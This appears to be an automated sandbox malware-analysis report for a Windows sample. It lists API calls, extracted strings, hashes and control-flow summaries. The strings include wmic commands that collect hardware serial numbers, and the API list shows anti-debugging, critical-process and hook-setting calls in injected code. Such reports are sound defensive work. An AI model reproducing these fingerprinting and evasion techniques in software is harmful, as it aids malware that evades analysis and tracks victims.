                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system$Beep$Window$ConsoleShow
                                                                                                                  • String ID: ajsgW$mrdV$sfkpfX
                                                                                                                  • API String ID: 2870283393-3563869954
                                                                                                                  • Opcode ID: c222f044f600f85a32eaf7eee6140250b602af87b35816563f8cc054bfd00be8
                                                                                                                  • Instruction ID: 9f82bdb4a998da5d1b1761658ad846bcf12e28dfd14df9fc1ab4f6934baee31b
                                                                                                                  • Opcode Fuzzy Hash: c222f044f600f85a32eaf7eee6140250b602af87b35816563f8cc054bfd00be8
                                                                                                                  • Instruction Fuzzy Hash: BA62BD2BE3EB864BF703A736D0020E8E3646FBB684791D727FD4471956FB2661C18604

                                                                                                                  Control-flow Graph

                                                                                                                   Control-flow graph of 7ff77c914350-7ff77c914e63 (43 basic blocks; the rendered graph and its executed/not-executed colouring are not preserved in this text export). Blocks that call an import:
                                                                                                                   • 7ff77c914513-7ff77c91454c: system
                                                                                                                   • 7ff77c914690-7ff77c9146c1: system
                                                                                                                   • 7ff77c914803-7ff77c91484a: system
                                                                                                                   • 7ff77c914990-7ff77c9149bf: system
                                                                                                                   • 7ff77c914b00-7ff77c914b51: system
                                                                                                                   • 7ff77c914ca0-7ff77c914ce4: system
                                                                                                                   • 7ff77c914e2c-7ff77c914e63: system
                                                                                                                   Each system block is preceded by two blocks that branch back to themselves (for the first: 7ff77c9143f0-7ff77c9144d1 and 7ff77c9144e0-7ff77c914511).
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system
                                                                                                                  • String ID: ajsgW$mrdV
                                                                                                                  • API String ID: 3377271179-1078366227
                                                                                                                  • Opcode ID: 10d52e6fea7bf0dfd9ad478f4741d2cfe5731d0e0e468b0231a8431259fda6b5
                                                                                                                  • Instruction ID: a78e625857b2e8d5074274d1285ee3a9b99c841cfe59d88599f540f474ac03e8
                                                                                                                  • Opcode Fuzzy Hash: 10d52e6fea7bf0dfd9ad478f4741d2cfe5731d0e0e468b0231a8431259fda6b5
                                                                                                                  • Instruction Fuzzy Hash: 5C52BB6BE3EB864BF703A736D0020D8E3649FBB684791D727FD5471952FB2661C28604

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 313767242-0
                                                                                                                  • Opcode ID: 1a5d05e5b76d707d2f4e40ba32f1890c6269f85629ab9340e2c9540fbe4604b8
                                                                                                                  • Instruction ID: 878496a88cc07a9d83dde540a10a4d937341fa55709e7a294094e2ab6d66c6a1
                                                                                                                  • Opcode Fuzzy Hash: 1a5d05e5b76d707d2f4e40ba32f1890c6269f85629ab9340e2c9540fbe4604b8
                                                                                                                  • Instruction Fuzzy Hash: 4E312F77629B81C6EBA09F60E8807EDB364FB88744F454039DA8D57B94DF38D548CB20
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 3e7af487194825cac56c75a0491d009657698e662dac04d831ac1c12f72091e9
                                                                                                                  • Instruction ID: e0427cfc2d0bdde9f3d4fddb5d28b62ce4877a1ea03936d88cf3398e0a3b0cb9
                                                                                                                  • Opcode Fuzzy Hash: 3e7af487194825cac56c75a0491d009657698e662dac04d831ac1c12f72091e9
                                                                                                                  • Instruction Fuzzy Hash: AA115E22B64F01CAEB40DF60E8542B8B3A4FB1C758F851E31DAAD467A4DF3CD1688750
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
                                                                                                                  • Instruction ID: 3f473e40351afb635ebfc9a0f8ea26bfe7bcebf9404af19de7c502ad090ec797
                                                                                                                  • Opcode Fuzzy Hash: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
                                                                                                                  • Instruction Fuzzy Hash: 18418633B255548BD78CCE29C8266AD73A2F39D304F85C639EB1AC7385DA39D905CB40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4a4eae3f1ed72a30295386fd46d0c16acbfbb20c65eb9c05bf2fee24b2204ffb
                                                                                                                  • Instruction ID: 8a3b7abaf18fc3ed78a56484babad5b536995515748f1ffb0dd20b8c8af71afc
                                                                                                                  • Opcode Fuzzy Hash: 4a4eae3f1ed72a30295386fd46d0c16acbfbb20c65eb9c05bf2fee24b2204ffb
                                                                                                                  • Instruction Fuzzy Hash: 3DA001629BCC0AD1E784AB04A950621E224BB58300B825071C08D411649E7CA9508A31

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C912F0C
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C912F17
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912F24
                                                                                                                    • Part of subcall function 00007FF77C91E570: memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E5D1
                                                                                                                    • Part of subcall function 00007FF77C91E570: memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E663
                                                                                                                    • Part of subcall function 00007FF77C91E570: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C91E689
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912FD2
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C912FDD
                                                                                                                    • Part of subcall function 00007FF77C91E570: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E640
                                                                                                                    • Part of subcall function 00007FF77C91F0C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF77C912F66), ref: 00007FF77C91F1E2
                                                                                                                    • Part of subcall function 00007FF77C91F0C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF77C912F66), ref: 00007FF77C91F1E9
                                                                                                                    • Part of subcall function 00007FF77C91E450: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF77C912FCB), ref: 00007FF77C91E500
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91308B
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C913096
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C913144
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91314F
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C9131FD
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C913208
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepsystem$_invalid_parameter_noinfo_noreturn$AttributeConsoleHandleTextmemcpy$BeepConcurrency::cancel_current_task
                                                                                                                  • String ID: Going back to Dashboard in 10 Seconds...$Bios SN:$Cpu SN:$DiskDrive SN:$ BaseBoard SN:$cls$wmic baseboard get serialnumber$wmic bios get serialnumber$wmic cpu get serialnumber$wmic diskdrive get serialnumber
                                                                                                                  • API String ID: 2072207396-883933296
                                                                                                                  • Opcode ID: 060b8f6e4652b921ad9382c2b9c02ee57329f16bcacb0801ecaa46bd7145b31f
                                                                                                                  • Instruction ID: 795ee288d941864e8c050f61271750a3753586a4a74d9d16193dde7d89025c1a
                                                                                                                  • Opcode Fuzzy Hash: 060b8f6e4652b921ad9382c2b9c02ee57329f16bcacb0801ecaa46bd7145b31f
                                                                                                                  • Instruction Fuzzy Hash: 5BB10E33B35A029AFB40EF60D4551ECB375BF49348FC05936DA4D526A9EE38E609C7A0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF77C9201C0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF77C9201DA
                                                                                                                  • __std_exception_copy.VCRUNTIME140 ref: 00007FF77C911C84
                                                                                                                    • Part of subcall function 00007FF77C9201C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C9201F0
                                                                                                                    • Part of subcall function 00007FF77C9201C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C9201F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_task$__std_exception_copymalloc
                                                                                                                  • String ID: aqua$black$blue$green$grey$hite$llow$purple$red$rple$white$yellow
                                                                                                                  • API String ID: 1777453549-4160983169
                                                                                                                  • Opcode ID: ccd7cb16edb6cb11090e525c8ddefe8df58638e67e087e0fe80ce8fba7c07e5b
                                                                                                                  • Instruction ID: 44d21c672b593f2bb552c1d9f7265dcae96e142b8055a176685cdd9223d9ac6e
                                                                                                                  • Opcode Fuzzy Hash: ccd7cb16edb6cb11090e525c8ddefe8df58638e67e087e0fe80ce8fba7c07e5b
                                                                                                                  • Instruction Fuzzy Hash: 95E14033928BC18EE361DF35E8403E9B7B4FB9D348F515225EAC856A59DF789284CB10

                                                                                                                  Control-flow Graph

                                                                                                                   control_flow_graph: function at 7ff77c91e8e0 (basic blocks 7ff77c91e8e0-7ff77c91eaae, MSVCP140 ostream/streambuf calls listed under APIs below; graph edges omitted)
APIs
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
• ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
• ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77C91EA65
• ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF77C91EA6C
• ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF77C91EA79
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
• String ID:
• API String ID: 834659371-0

Control-flow Graph

APIs
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920035
• ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920055
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920065
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200AC
• ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200D9
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200FA
• ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920140
• ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920147
• ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920154
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
• String ID:
• API String ID: 3274656010-0
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: memcmp$Xout_of_range@std@@_invalid_parameter_noinfo_noreturn
• String ID: invalid map<K, T> key
• API String ID: 3077429687-1394099236
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: __current_exception__current_exception_contextterminate
• String ID: csm
• API String ID: 2542180945-1018135373
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1775671525-0
APIs
• memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E5D1
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E640
  • Part of subcall function 00007FF77C9201C0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF77C9201DA
• memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E663
• Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C91E689
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
• String ID:
• API String ID: 1155477157-0
APIs
• GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
• SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
• GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
• SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
Memory Dump Source
• Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
• Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
Similarity
• API ID: AttributeConsoleHandleText
• String ID:
• API String ID: 1363055914-0

Execution Graph

Execution Coverage: 22.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 33.3%
Total number of Nodes: 9
Total number of Limit Nodes: 0

Control-flow Graph

Nodes (basic blocks):
• 1145: 7ffaac3b7be1-7ffaac3b7c9d, API: CheckRemoteDebuggerPresent
• 1149: 7ffaac3b7ca5-7ffaac3b7ce8
• 1150: 7ffaac3b7c9f
Edges: 1145->1149, 1145->1150, 1150->1149
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0

Control-flow Graph

Nodes (basic blocks):
• 1124: 7ffaac3b97ad-7ffaac3b9890, API: RtlSetProcessIsCritical
• 1128: 7ffaac3b9892
• 1129: 7ffaac3b9898-7ffaac3b98cd
Edges: 1124->1128, 1124->1129, 1128->1129
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0

Control-flow Graph

Nodes (basic blocks):
• 1131: 7ffaac3b9fb8-7ffaac3b9fbf
• 1132: 7ffaac3b9fca-7ffaac3ba03d
• 1133: 7ffaac3b9fc1-7ffaac3b9fc9
• 1137: 7ffaac3ba043-7ffaac3ba048
• 1138: 7ffaac3ba0c9-7ffaac3ba0cd
• 1139: 7ffaac3ba052-7ffaac3ba08f, API: SetWindowsHookExW
• 1140: 7ffaac3ba04f-7ffaac3ba050
• 1141: 7ffaac3ba097-7ffaac3ba0c8
• 1142: 7ffaac3ba091
Edges: 1131->1132, 1131->1133, 1132->1137, 1132->1138, 1133->1132, 1137->1140, 1138->1139, 1139->1141, 1139->1142, 1140->1139, 1142->1141
APIs
Memory Dump Source
